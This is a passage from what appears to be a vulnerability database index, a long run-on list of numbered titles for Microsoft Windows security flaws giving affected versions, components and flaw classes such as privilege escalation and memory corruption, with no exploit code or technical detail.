Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure [98111] Microsoft Windows 7 SP1/Vista SP2 DVD Maker cross site request forgery [98110] Microsoft Windows Active Directory Federation Services information disclosure [98069] Microsoft Windows up to Server 2012 R2 Color Management privilege escalation [98068] Microsoft Windows up to Vista SP2 Graphics Component USP10!otlList::insertAt memory corruption [98067] Microsoft Windows up to Vista SP2 Color Management information disclosure [98066] Microsoft Windows Color Management information disclosure [98065] Microsoft Windows up to Vista SP2 GDI+ information disclosure [98058] Microsoft Windows iSNS Server memory corruption [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [98055] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [98054] Microsoft Windows up to Server 2016 SMBv2/SMBv3 denial of service [98052] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98051] Microsoft Windows up to Vista SP2 Uniscribe information disclosure [98050] Microsoft Windows up to Vista SP2 Uniscribe Read/Write memory corruption [98049] Microsoft Windows Uniscribe information disclosure [98048] Microsoft Windows Uniscribe information disclosure [98047] Microsoft Windows Uniscribe information disclosure [98046] Microsoft Windows Uniscribe information disclosure [98045] Microsoft Windows Uniscribe information disclosure [98044] Microsoft Windows Uniscribe information disclosure [98043] Microsoft Windows Uniscribe information disclosure [98042] Microsoft Windows Uniscribe information disclosure [98041] Microsoft Windows Uniscribe information disclosure [98040] Microsoft Windows Uniscribe information disclosure [98039] Microsoft Windows Uniscribe information disclosure [98038] Microsoft Windows Uniscribe information disclosure [98037] Microsoft Windows Uniscribe information disclosure [98036] Microsoft Windows Uniscribe information disclosure [98035] Microsoft Windows Uniscribe information disclosure [98034] Microsoft Windows Uniscribe information disclosure [98033] Microsoft Windows Uniscribe information disclosure [98032] Microsoft Windows Uniscribe information disclosure [98031] Microsoft Windows Uniscribe rule information disclosure [98030] Microsoft Windows Uniscribe memory corruption [98029] Microsoft Windows Uniscribe memory corruption [98028] Microsoft Windows Uniscribe memory corruption [98027] Microsoft Windows Uniscribe memory corruption [98026] Microsoft Windows Uniscribe memory corruption [98025] Microsoft Windows Uniscribe memory corruption [98024] Microsoft Windows Uniscribe Data Processing Error [98023] Microsoft Windows up to Vista SP2 SMB privilege escalation [98022] Microsoft Windows up to XP SP3 SMB information disclosure [98021] Microsoft Windows up to XP SP3 SMB privilege escalation [98020] Microsoft Windows up to XP SP3 SMB privilege escalation [98019] Microsoft Windows up to XP SP3 SMB privilege escalation [98018] Microsoft Windows up to XP SP3 SMB privilege escalation [98017] Microsoft Windows up to Server 2016 PDF memory corruption [98016] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98015] Microsoft Windows 10/Server 2016 Hyper-V privilege escalation [98014] Microsoft Windows up to Vista SP2 Hyper-V information disclosure [98013] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [98012] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98011] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98010] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98009] Microsoft Windows up to Vista SP2 Hyper-V privilege escalation [98007] Microsoft Windows 10/Server 2016 Hyper-V Network Switch privilege escalation [98006] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [96521] Microsoft Windows 8.1/10/Server 2012/Server 2016 SMB Response mrxsmb20.sys denial of service [95126] Microsoft Windows Local Security Authority Subsystem Service privilege escalation [94457] Microsoft Windows up to Vista SP2 Win32k privilege escalation [94456] Microsoft Windows up to Vista SP2 PFB Font win32k.sys Data Processing Error [94437] Microsoft Windows up to Vista SP2 Uniscribe LoadUvsTable Data Processing Error [94436] Microsoft Windows 10 Graphics Data Processing Error [94435] Microsoft Windows up to Vista SP2 Graphics Data Processing Error [94434] Microsoft Windows GDI information disclosure [93964] Microsoft Windows 7 Excel Starter 2010 XML External Entity [93963] Microsoft Windows Authorization Manager msxml3.dll File information disclosure [93962] Microsoft Windows 7 SP1 Event Viewer File information disclosure [93954] Microsoft Windows 7 SP1 NFO File MSINFO32.EXE XML External Entity [93953] Microsoft Windows Media Center 6.1.7600 MCL File ehshell.exe XML External Entity [93602] Microsoft Windows 7/10 cmd.exe privilege escalation [93419] Microsoft Windows up to Vista SP2 NTLM Password Change privilege escalation [93418] Microsoft Windows up to Vista SP2 Local Security Authority Subsystem Service privilege escalation [93390] Microsoft Windows up to Vista SP2 Open Type Font privilege escalation [93389] Microsoft Windows up to Server 2016 Media Foundation memory corruption [93388] Microsoft Windows up to Server 2016 Animation Manager Stylesheets memory corruption [93387] Microsoft Windows up to Vista SP2 Open Type Font information disclosure [93386] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control privilege escalation [93383] Microsoft Windows up to Vista SP2 Image File Upload privilege escalation [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [92595] Microsoft Windows 10 Diagnostics Hub privilege escalation [92590] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92589] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92588] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92587] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Transaction Manager privilege escalation [92586] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92585] Microsoft Windows Vista SP2/7 SP1/8.1/RT 8.1/10 Video Control memory corruption [92583] Microsoft Windows up to Vista SP2 True Type Font privilege escalation [92582] Microsoft Windows up to Vista SP2 GDI+ privilege escalation [92581] Microsoft Windows up to Vista SP2 Graphics privilege escalation [92580] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [92579] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92578] Microsoft Windows up to Vista SP2 GDI+ information disclosure [92577] Microsoft Windows up to Vista SP2 True Type Font information disclosure [91572] Microsoft Windows up to Vista Scripting Engine memory corruption [91571] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91570] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library information disclosure [91569] Microsoft Windows up to Vista privilege escalation [91561] Microsoft Windows up to Vista Object memory corruption [91560] Microsoft Windows 10 Object memory corruption [91559] Microsoft Windows 8.1/10/RT 8.1 NTLM SSO privilege escalation [91540] Microsoft Windows up to Vista GDI memory corruption [91539] Microsoft Windows up to Vista GDI privilege escalation [91538] Microsoft Windows up to Vista GDI 7PK Security Features [91537] Microsoft Windows win32k.sys privilege escalation [91536] Microsoft Windows up to Vista win32k.sys privilege escalation [90934] Microsoft Windows 7/8.1 FON Font File win32k.sys denial of service [90713] Microsoft Windows up to Vista SP2 NetBIOS privilege escalation [90712] Microsoft Windows 10/10 1511 Universal Outlook information disclosure [90711] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF privilege escalation [90710] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 Netlogon privilege escalation [90709] Microsoft Windows up to Vista SP2 Kerberos privilege escalation [90702] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90701] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90700] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90699] Microsoft Windows up to Vista SP2 Kernel-Mode Driver win32k privilege escalation [90698] Microsoft Windows Graphics privilege escalation [90697] Microsoft Windows Graphics privilege escalation [90696] Microsoft Windows up to Vista SP2 Graphics privilege escalation [90252] Microsoft Windows TCP/IP NetBios Helper Service information disclosure [89605] Microsoft Windows NT 4.0/2000 Security Event Log denial of service [89604] Microsoft Windows NT 4.0/2000 Application Event Log denial of service [89571] Microsoft Windows IMAPI CD Burning COM privilege escalation [89570] Microsoft Windows Netmeeting Remote Desktop Sharing privilege escalation [89520] Microsoft Windows Terminal Services information disclosure [89505] Microsoft Windows FTP Server privilege escalation [89504] Microsoft Windows System Event Log privilege escalation [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89431] Microsoft Windows FAT32 Partition Driver information disclosure [89417] Microsoft Windows RAS Connection weak encryption [89413] Microsoft Windows Default Share privilege escalation [89411] Microsoft Windows LanMan Hash weak authentication [89389] Microsoft Windows Auto Update information disclosure [89345] Microsoft Windows NetBIOS Shared Folder information disclosure [89344] Microsoft Windows NetBIOS/SMB Authentication information disclosure [89342] Microsoft Windows 95/98 LanMan Hash weak encryption [89340] Microsoft Windows 95/98 SMB Service memory corruption [89337] Microsoft Windows FTP Service denial of service [89335] Microsoft Windows NetBIOS/CIFS weak encryption [89303] Microsoft Windows Admin Account weak authentication [89299] Microsoft Windows LanMan Authentication weak authentication [89297] Microsoft Windows Startup Malware privilege escalation [89295] Microsoft Windows Services information disclosure [89294] Microsoft Windows Guest Account information disclosure [89293] Microsoft Windows Guest Account unknown vulnerability [89292] Microsoft Windows Guest Account Log information disclosure [89290] Microsoft Windows Security Log denial of service [89288] Microsoft Windows Winlogon privilege escalation [89259] Microsoft Windows Patch MS04-002 privilege escalation [89150] Microsoft Windows RAS weak encryption [89051] Microsoft Windows up to Vista SP2 .NET Framework information disclosure [89036] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver privilege escalation [89035] Microsoft Windows up to Vista SP2 Print Spooler ntprint.dll PSetupDownloadAndInstallLegacyDriver 7PK Security Features [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88883] Microsoft Windows VeriSign weak authentication [88787] Microsoft Windows NT 4.0 RAS via PPP denial of service [88786] Microsoft Windows NT 4.0 NetBIOS Over TCP privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88775] Microsoft Windows XP Digitally Sign weak authentication [88774] Microsoft Windows XP Digitally Sign weak authentication [88773] Microsoft Windows XP Digitally Sign weak authentication [88772] Microsoft Windows XP Session Key weak authentication [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88763] Microsoft Windows Remote Data Services information disclosure [88706] Microsoft Windows up to NT 3.51 SP4/4.0 SP5 RRAS denial of service [88686] Microsoft Windows Locator Service information disclosure [88675] Microsoft Windows information disclosure [88670] Microsoft Windows Password Filter privilege escalation [88664] Microsoft Windows NT 4.0 TCP/IP Security privilege escalation [88658] Microsoft Windows NT 4.0 Device Driver privilege escalation [88657] Microsoft Windows NT 4.0/2000 DHCP Server information disclosure [88655] Microsoft Windows 2000 DNS Server privilege escalation [88649] Microsoft Windows information disclosure [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88630] Microsoft Windows Registry Permission privilege escalation [88598] Microsoft Windows NT 4.0/2000 privilege escalation [88438] Microsoft Windows 95/98 ICMP denial of service [88319] Microsoft Windows NT 4.0 File Protection privilege escalation [88316] Microsoft Windows privilege escalation [88313] Microsoft Windows W32/Deloder Worm privilege escalation [88311] Microsoft Windows UPnP TCP Helper information disclosure [88285] Microsoft Windows CIS information disclosure [88283] Microsoft Windows Terminal Services/Citrix Server weak authentication [88281] Microsoft Windows SvcOpenSCManager information disclosure [88280] Microsoft Windows DCE/RPC information disclosure [88276] Microsoft Windows shlwapi.dll denial of service [88269] Microsoft Windows Registry Password information disclosure [88268] Microsoft Windows information disclosure [88266] Microsoft Windows information disclosure [88265] Microsoft Windows information disclosure [88264] Microsoft Windows User information disclosure [88253] Microsoft Windows SMB Server privilege escalation [88251] Microsoft Windows Guest Account privilege escalation [88240] Microsoft Windows NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 SNMP GET unknown vulnerability [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88210] Microsoft Windows Secure Site weak encryption [88199] Microsoft Windows NT 4.0 Ssping teardrop2 Patch denial of service [88198] Microsoft Windows DNS Server privilege escalation [88196] Microsoft Windows Force Shutdown from a Remote System Privilege privilege escalation [88195] Microsoft Windows Modify Firmware Environment Values Privilege privilege escalation [88194] Microsoft Windows Debug Programs Privilege privilege escalation [88193] Microsoft Windows Restore Files/Directories Privilege privilege escalation [88192] Microsoft Windows Backup Files/Directories Privilege privilege escalation [88191] Microsoft Windows Create a Pagefile Privilege privilege escalation [88190] Microsoft Windows Increase Scheduling Priority Privilege privilege escalation [88188] Microsoft Windows Profile Single Process Privilege privilege escalation [88187] Microsoft Windows Change the System Time Privilege privilege escalation [88186] Microsoft Windows Create Permanent Shared Objects Privilege privilege escalation [88185] Microsoft Windows Profile System Performance Privilege privilege escalation [88184] Microsoft Windows Act as Part of the Operating System Privilege privilege escalation [88183] Microsoft Windows Increase Quotas Privilege privilege escalation [88182] Microsoft Windows Load/Unload Device Drivers Privilege privilege escalation [88181] Microsoft Windows Lock Pages in Memory Privilege privilege escalation [88179] Microsoft Windows Protocol information disclosure [88178] Microsoft Windows Network Interface information disclosure [88173] Microsoft Windows rsh TCP Sequence privilege escalation [88172] Microsoft Windows Service Unknown information disclosure [88171] Microsoft Windows Registry File Association privilege escalation [88159] Microsoft Windows Remote Access Service information disclosure [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [88152] Microsoft Windows NetBIOS privilege escalation [88151] Microsoft Windows Registry privilege escalation [88150] Microsoft Windows NT Share information disclosure [87961] Microsoft Windows up to Server 2012 R2 Search privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87959] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87958] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF privilege escalation [87957] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF information disclosure [87952] Microsoft Windows 10/10 1511 Diagnostic Hub Data Processing Error [87951] Microsoft Windows up to Vista SP2 WPAD Data Processing Error [87950] Microsoft Windows up to Vista SP2 WPAD privilege escalation [87949] Microsoft Windows Netlogon privilege escalation [87948] Microsoft Windows up to Vista SP2 SMB Server privilege escalation [87947] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver atmfd.dll privilege escalation [87946] Microsoft Windows 10 Kernel win32k.sys privilege escalation [87945] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87944] Microsoft Windows Server 2012/Server 2012 R2 Virtual PCI Memory information disclosure [87943] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87942] Microsoft Windows up to Vista SP2 Kernel win32k.sys privilege escalation [87941] Microsoft Windows up to Vista SP2 Group Policy privilege escalation [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87167] Microsoft Windows up to Vista SP2 DirectX Graphics Kernel Subsystem privilege escalation [87166] Microsoft Windows up to Server 2012 R2 DirectX Graphics Kernel Subsystem privilege escalation [87165] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87164] Microsoft Windows up to Vista SP2 win32k.sys information disclosure [87163] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87162] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87161] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [87160] Microsoft Windows up to Vista SP2 RPC Network Data Representation Engine privilege escalation [87158] Microsoft Windows Vista SP2/7 SP1/8.1 Media Center privilege escalation [87156] Microsoft Windows 8.1/10/RT 8.1/Server 2012 R2 Shell privilege escalation [87155] Microsoft Windows Vista SP2/7/8.1/RT 8.1/10 Journal privilege escalation [87154] Microsoft Windows up to Vista SP2 Imaging memory corruption [87153] Microsoft Windows up to Vista SP2 Direct3D memory corruption [87152] Microsoft Windows up to Vista SP2 Graphics Component privilege escalation [87151] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87150] Microsoft Windows up to Vista SP2 Graphics Component information disclosure [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [83151] Microsoft Windows EMF File GetEnhMetaFilePaletteEntries denial of service [82236] Microsoft Windows up to Vista SP2 OLE privilege escalation [82234] Microsoft Windows 10 HTTP.sys Data Processing Error [82231] Microsoft Windows up to Vista SP2 Font Library memory corruption [82226] Microsoft Windows up to Vista SP2 SAM/LSAD Badlock 7PK Security Features [82223] Microsoft Windows 8.1/10/Server 2012 R2 Hyper-V Memory information disclosure [82222] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Memory information disclosure [82221] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Hyper-V privilege escalation [81899] Microsoft Windows Media Services privilege escalation [81837] Microsoft Windows NT 4.0 SynAttackProtect denial of service [81815] Microsoft Windows NT 3.51/NT 4.0 Registry privilege escalation [81814] Microsoft Windows Telnet weak encryption [81813] Microsoft Windows XP weak encryption [81812] Microsoft Windows XP Network Client Feature weak authentication [81801] Microsoft Windows Logon Hours privilege escalation [81798] Microsoft Windows XP Remote Desktop information disclosure [81788] Microsoft Windows privilege escalation [81719] Microsoft Windows privilege escalation [81718] Microsoft Windows 4.0/4.0 SP1/4.0 SP2/4.0 SP3 Service Pack Patches privilege escalation [81685] Microsoft Windows Guest Account privilege escalation [81284] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [81283] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81282] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81281] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81280] Microsoft Windows up to Vista SP2 Kernel Mode Driver win32k.sys privilege escalation [81279] Microsoft Windows up to Vista SP2 USB Mass Storage Class Driver privilege escalation [81277] Microsoft Windows privilege escalation [81276] Microsoft Windows up to Vista SP2 OLE privilege escalation [81275] Microsoft Windows up to Vista SP2 OLE privilege escalation [81271] Microsoft Windows 10 PDF Library privilege escalation [81270] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 PDF Library privilege escalation [81269] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81268] Microsoft Windows up to Server 2012 R2 Media Parser privilege escalation [81267] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81266] Microsoft Windows up to Vista SP2 OpenType Font privilege escalation [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80885] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80879] Microsoft Windows Network Policy Server RADIUS privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [80877] Microsoft Windows up to Vista SP2 Forms information disclosure [80876] Microsoft Windows up to Vista SP2 .NET Framework privilege escalation [80874] Microsoft Windows 7 SP1/8.1/10/Server 2012/Server 2012 R2 RDP privilege escalation [80866] Microsoft Windows up to Vista SP2 DLL Loader privilege escalation [80865] Microsoft Windows 8.1/RT 8.1/Server 2012/Server 2012 R2 DLL Loader privilege escalation [80864] Microsoft Windows up to Vista DLL Loader privilege escalation [80863] Microsoft Windows up to Vista DLL Loader privilege escalation [80861] Microsoft Windows up to Vista SP2 Journal memory corruption [80860] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 Reader privilege escalation [80859] Microsoft Windows 8.1/10/Server 2012/Server 2012 R2 PDF Library memory corruption [80223] Microsoft Windows 10/1511 RDP Service 7PK Security Features [80220] Microsoft Windows up to Vista SP2 DirectShow memory corruption [80215] Microsoft Windows up to Vista SP2 win32k.sys privilege escalation [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80213] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [80212] Microsoft Windows up to Vista SP2 Sandbox privilege escalation [79515] Microsoft Windows 10 Kernel privilege escalation [79514] Microsoft Windows up to Vista Kernel privilege escalation [79513] Microsoft Windows up to Vista Kernel privilege escalation [79512] Microsoft Windows up to Vista Kernel privilege escalation [79511] Microsoft Windows Vista/7/8/8.1 Media Center privilege escalation [79510] Microsoft Windows Vista/7/8/8.1 Media Center information disclosure [79509] Microsoft Windows up to Vista PGM race condition [79508] Microsoft Windows up to Server 2012 R2 Library Loader privilege escalation [79507] Microsoft Windows up to Vista Library Loader privilege escalation [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79495] Microsoft Windows up to Vista Graphics memory corruption [79494] Microsoft Windows up to Vista Graphics memory corruption [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79492] Microsoft Windows DNS memory corruption [79191] Microsoft Windows Journal memory corruption [79184] Microsoft Windows up to Vista TLS Schannel privilege escalation [79183] Microsoft Windows up to Server 2012 R2 IPsec denial of service [79182] Microsoft Windows up to Vista Winsock privilege escalation [79174] Microsoft Windows up to Vista Kernel 7PK Security Features [79173] Microsoft Windows up to Server 2012 R2 Graphics information disclosure [79172] Microsoft Windows up to Vista Graphics privilege escalation [79171] Microsoft Windows up to Vista Graphics privilege escalation [79170] Microsoft Windows up to Vista Kernel information disclosure [79169] Microsoft Windows up to Vista Kernel privilege escalation [79168] Microsoft Windows up to Vista Kernel 7PK Security Features [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78364] Microsoft Windows 7 SP1/Vista SP2 Shell memory corruption [78363] Microsoft Windows up to Vista SP2 Shell memory corruption [77640] Microsoft Windows Active Directory Code [77636] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77625] Microsoft Windows up to Vista SP2 Journal File Numeric Error [77622] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77621] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77620] Microsoft Windows up to Vista SP2 Journal File privilege escalation [77616] Microsoft Windows Vista SP2/7 